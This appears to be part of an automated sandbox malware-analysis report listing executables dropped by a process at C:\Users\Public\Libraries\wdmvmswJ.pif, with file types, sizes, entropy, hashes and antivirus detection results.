File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1318400
Entropy (8bit):7.448801860827976
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.4460825138159645
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:XnEbH0j4x7R6SvyCMkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:XkwOtO7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:582DC946FC5CB8C255D1189119A3BE34
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50BEF2C348BCB8DFB9147F936C23F0BD47BAE639
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC15AF431256025E4647A03012AFC82D4C15C01B67C963100398B9E7EA4A6318
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C3A21647C0371D6C5BE07C37419855644004CA6D782D18DC100FEC51A4E27504F9026FFC351FC387E75C302C70C98DCFA226D9EC4FBF50F1F40F905DAA424BB5
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446838912937845
Encrypted:false
SSDEEP:24576:GnU/h/4KXsqjnhMgeiCl7G0nehbGZpbD:GU/VrDmg27RnWGj
MD5:6E00DB5E93DFC5A8B2C4601491F8D8CA
SHA1:DE3D515709C6E10EA99FF470484B819085337820
SHA-256:84ABC5513249E75C07E99515F8752962F8108FC64BA3E3048265C180E2DEBB85
SHA-512:A3A962B8ACBA7241FCA8A499B3F5BA0962924DD5AA193FF35FD1AD17FDC57E3F6B0D773C3E9E846CE8E5F722B772C9664CB724E8222BBCB9B86C31361B426ADA
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.483762497249394
Encrypted:false
SSDEEP:24576:/x71iBLZ05jNTmJWExQsqjnhMgeiCl7G0nehbGZpbD:/xhiHIjNgMDmg27RnWGj
MD5:D29560F00A40B37A5ECEF689B06439AC
SHA1:E7B9DE2F20C1AA83794FC6DC78DBE5683060495D
SHA-256:A9B67EBAEAC90E7A75EC8C8372B26D22455B7FDDFE5C6F417275A5205C776987
SHA-512:26C03E29733B3BE2039B2FFA0C46498747947D35D0D9536710AFB20D493AAEF79A574907EDDC69B42F8EDA9ED9504F82C96C4036DCC9408D8ABA6E97D3675F3D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1419264
Entropy (8bit):5.4667377008834555
Encrypted:false
SSDEEP:24576:ElnRklQ6fgJcEwix+sqjnhMgeiCl7G0nehbGZpbD:goRfgJcEwCSDmg27RnWGj
MD5:6D66B829F1B8E841A3A89282BFB2B37F
SHA1:CB6438CA63FA76B358E7E51222C0EBFDCA92E9C5
SHA-256:2A967EDB732EC3201281EE8284BDE7ECFD577F2F488F1EE9A0BDB36DE2CC3168
SHA-512:7838EDACB75731611829FE19F6B485BB7B8F6C61867B7F076EDFE2B832AC3DF490764FF19ECBA7DAC063ACBE39686858BBF3869DF16531813F407ED75FFC6E80
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.496556950892986
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:AW25k8hb0Haw+xOsqjnhMgeiCl7G0nehbGZpbD:AWyk8SHawmiDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6967E6BF7B5B511ABD3AA4F79405A5B2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4DD758812C57C02E4EDA6DF929BCFA5B3C14D3BD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1BB603FECF0042BB3D36FA858E083277CB3825F18BF6DADFFE06A24C557E4280
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:055930E5FEB7711D77C95A2BDB9879148554163452BFDC977A7BE12D3FB872EB7FB0BBBC8A83E4BE3A43C830FA6EA05201EF917415950129C7F089F69C193F58
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163957700428245
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:nWP/aK2vB+1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:nKCKABWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:8AC267010867746C9A420F01181F4217
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C17D619CEE8B0DF875EA90A611B7BE1F5B69AACE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4C30067154C169B296228419F83B8484121D57232F1481F6357B4D9938C14DDA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A6C2BC4A0D82ADA31CE8E99BB77629B3CD8F5B9C71A7A3079E6441578948BCC665920D8B72BA11E8A64009CAAA7749F5DEFBEDCCD23C55B327C23DA60BE8A83B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.162047104041508
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:pO7cCNWB+09HXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ojNWBPlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:691E3341727CE7F7A488D2FD1E81F9EC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:723ED6090EA850B62EA37F7CB7C430DC205CD51F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F21ABD67232583CB095544248041A4576EC993CC001F779D7A6E07B0B7796BC2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0E9AD37809BF8A7CA95A0F921C935D2341B28422776769728D51B012355858CA66EC6E8960FC37613F567D08ACC6A0530E654677A207336BE1223E794EE9A797
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.238943048379839
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:qihRyhdsRrrsqjnhMgeiCl7G0nehbGZpbD:qihsoRfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AE21B6B9DB13147E61708D60061FD4D4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7FA3AE8DF1211BE6ED7320C4F2EA8146191F5595
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6F4C7B1EA926FD2F460990202EF8F53FD496159608FA2ED2C1B5D79AF627DCCA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:503E57FE1EA2B6DEF5BE2C57CD3324DE4C09F631C8CCA4274951202245F47A9AE191B3129AEB6124997C71A5B057FC38FC0CCE33DB9EAEF79E33DCAB44252B33
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.351029069546174
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:v1FDmRF+wpx/Qaf8sqjnhMgeiCl7G0nehbGZpbD:rmRF+wn/JfoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AB12413F8ADF81CD61F47B65C8191D91
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:395965426D175EAAAD5F288244B92CEF517F13F0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:778940328D784AA7EF5419F0341D8884E06547B8B3A226385A69F652343DB45F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F86753BE890A7B39AA0679693E89487BF6B6DC23F300A89268CE5A6D714B641FB34995F4DF485E47B2465D03B6FBF24022A80DBB10C20CF01D0CEA3AB829EF2A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.161999738741843
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Q2Ae621B+0YRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:9E21BPKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:146E89CAAC008C1564C79A968E253A2B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50D396F80D6758887BD6362424475DC18DF85621
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:75DDE01518EBE41997BD828A34D0A542212C69783C9C6A94F44BAC4C36410A40
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC37F8FB0881D85A25FCCF0354974536C81118AFFE8736D8B69BF18CD0DFB4C51A1CB26F3F0C5C7AAA35529F1B6CD917F1B17206ECD9B68F563C95BD28EC73BB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999989848925704
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3145728:ILAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:yBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:19B25C0B01E36B20F775D2E51DF8D6E0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EE34F811EDB834A7B52DB46AE3854339D9B3EF74
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF3EF17B92A66D23714746394E7B8DB35A736293D35402F8DA45B898364E1BDF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5FC567AA0BADD939D22F4B409E949E60046623073407D1224B1486C762F9CA11526119008BE5B2303147A2C71A73FEECFA8337206127FBA32A6793561FE1B326
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0680903264293455
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:FWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F66209B3EEC662B0B39D950BE74B6B5D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:224C63DF0CD0A43355D3E8FCB095BFABF0FD3B0D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6CB4FE6E3100664143CB3B87A097054AAB859DF46DB7D92D60D0B9BEF26A148A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB4DB8CF15A1B4E4112C32455483D4013BB22171CB6DFE0D977390A0B0522271DE00A0D6B91ECFEEE8CA8AE4E2440A087BEF1DFCE0B675D5C86CD946DCFB7260
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032428608819242
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:JKVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8VsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9312EB6204E504A57750175EC71EA0C7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:490274733D5378FFFC1FA8A7EA82957AA9A10B35
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:68D6A9D77A7030FEB2E343938677B0760F5E92E7E4AD7B80D768BA5885BAA072
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F841660DCD40552E0D99B3C14FDA1E4A565D5F6B6C6E1897774A68B866F3A75F6CE99580A41373CFC08F8DAA98356A4762DFFDD15C27AD49C221BD0D39F106CD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.446085543295778
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/nEbH0j4x7R6SvyCMkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:/kwOtO7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9A7105EED62B1DAE0D1D1D6D2C0DFB90
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A10B751F7902C35360E8A59329D2A93EBE880C7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:118FD11580BBF77B1D746F4EF62542382FD2F8019237855D0F35FBDA4944498D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:667BFDA89195528503EBEF5AC4057ACCEB70C55F649DA3F5E0BDF49FC79568FF0FA9C1405C688ABFB20A7E1B49165A0E3FA9F002091D7217D1D82F9F84F87FCF
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.119746757907992
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Mv1vvpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:81JsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A7EACF077D0A0350506BD1E2109E515D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C4140A546D4391CDCB271CBFA8D401D46236CB1E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A286615DD163790583D9BBFC2EAFF99D363932F444AB2F220A2B6626DDCA346D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:464CC5BC58682D294EB923DA5334AEBA4B6E7DE4F8B7495F422D9B707BB54CAE9A963992BC04E2AD94CB4B4C8ABD80674B73D66BB0A046DA8E517387D4852F19
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.446834943908701
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:DnU/h/4KXsqjnhMgeiCl7G0nehbGZpbD:DU/VrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D78A5AAEA58E0159B47FC19C691D1334
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:32B9BBADB5D54C839A6A68A4ACCB156B129160AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:10D7609BCDFF7605FD29D91395B6519B2BE1525367FCB38DD22512B0483E1767
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D347A08A97C23F95537C5F6166026F4C5DC73FAE02FF80722ED42E30649E4583EBF36180DF24A9C5120827A4DE9A499094E6E84028278069A83846D8E00D1388
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.483761953888129
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:xx71iBLZ05jNTmJWExQsqjnhMgeiCl7G0nehbGZpbD:xxhiHIjNgMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F1726C44CE3C97EC96140B27591F12CD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:429243996126A2102F30F4D5EAD16F6A07D3AABF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:42F53E47C40B949D2BDBEF5088AE35600B96B1AC7109B9D63F1655FF72EC0008
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51187252EA750EF08F257D3ACAAF61EDB2F3C0D4FD3A26610B38A5C48EC952746F0709F99933E054B2B3D9F66D50E74659458CB0A9ADD236DC7FA54047884C9C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032903438073016
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:j3rFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7JsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE5EC3FF2312C43AA909295E274A9D1A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:216F8659A55F93E1A6AD6B40A7D842D37AB0E134
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AB97F6566992F1EC85D2E3D24113B6A4F6A7AAA22FF82D1BB60140B4FB72DD62
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9ED486A0F34B0B4A0774CFBC29A9CCC8FE51C7129BF23B3119270DC9EEF85B40021B4E650344ABB7C3E77042DFBD8C4A21EBB0946F857C05F90DBACC73362164
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.172693215659001
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:qYdP/yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bdP/ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:226E673A0ED0BEC11EB93C20A421BBD4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B6F84C13C6C9B41491D1EB5D6DE5C58E033FACED
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:174721A88C3EDD74FF3061B5AA64D19BF5C681D94F2288E5321359428DAA05C9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A42D60670B0E10B833F252E5322E10F5EF265B3E53D3536BAE31010099FB4C02E9EC54789BCB7E1541749FFBA428BC6A527E4E2E45E73AA5DD7DCDAB5D2FCCB7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
